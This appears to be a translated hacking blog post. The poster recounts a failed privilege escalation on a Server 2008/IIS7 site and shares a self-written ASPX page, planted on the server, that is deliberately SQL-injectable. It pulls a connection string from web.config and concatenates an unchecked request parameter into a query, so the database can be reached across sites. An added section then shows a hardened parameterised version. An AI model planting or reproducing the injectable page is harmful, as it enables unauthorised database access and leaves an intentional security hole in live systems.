Yesterday 4z1 and I were looking at a site. Escalating privileges was really hard; we stared at it for a full 5 hours with nothing to show for it. 2008 + IIS7, no sa, no root, no services of any kind...!
Along the way we actually used an aspx constructed-injection page to cross over to the other site, but of the pile of code I found online, not one piece worked.
It's not much code, so I just wrote one myself and was done with it. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // Open the connection named in web.config (replace "连接名" with the name of the connectionStrings entry)
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
    conn.Open();

    // The injection point: the value is taken straight from the request, e.g. ?xxser=1
    string i = this.Page.Request.Params["xxser"];

    // The input is concatenated into the SQL text unquoted and unchecked; that is what makes this page
    // injectable by design (replace [表] and 列名 with the real table and column)
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    // ExecuteNonQuery still runs the statement on the server (so any SQL error surfaces), but returns -1 for a SELECT
    int x = command.ExecuteNonQuery();
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}

</script>
</div>
</form>
</body>
</html>
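For comparison, here is the same lookup page written the way it should be when the goal is to stop exactly this kind of injection. This is an added example, not the poster's code: the connection-string name (`ConnName`), table (`SomeTable`) and column (`SomeColumn`) are placeholders, and the column is assumed to be an integer.

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>Parameterized lookup (hardened counterpart)</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // 1. Type-check the input first: the column is numeric (assumption), so anything that is
    //    not an integer is rejected before a connection is even opened.
    int id;
    if (!int.TryParse(Request.QueryString["xxser"], out id))
    {
        Response.StatusCode = 400;
        Response.Write("bad request");
        return;
    }

    // 2. Bind the value as a typed parameter. The SQL text is a constant; the user value travels
    //    separately and can never change the statement's structure.
    //    "ConnName", "SomeTable" and "SomeColumn" are placeholders for this example.
    using (SqlConnection conn = new SqlConnection(
        ConfigurationManager.ConnectionStrings["ConnName"].ConnectionString))
    using (SqlCommand command = new SqlCommand(
        "select count(*) from [SomeTable] where SomeColumn = @id", conn))
    {
        command.Parameters.Add("@id", SqlDbType.Int).Value = id;
        conn.Open();
        int rows = (int)command.ExecuteScalar();

        // 3. Encode anything echoed back so the response cannot be used for reflected script either.
        Response.Write(HttpUtility.HtmlEncode(rows.ToString()));
    }
}

</script>
</div>
</form>
</body>
</html>
```

Two details matter beyond the parameter itself: the `using` blocks close the connection even when the query throws, and the page echoes only a count it computed, never the raw input. Pair this with `<customErrors mode="On" />` in web.config so that a SQL error returns a generic page instead of the error text the original page relies on seeing.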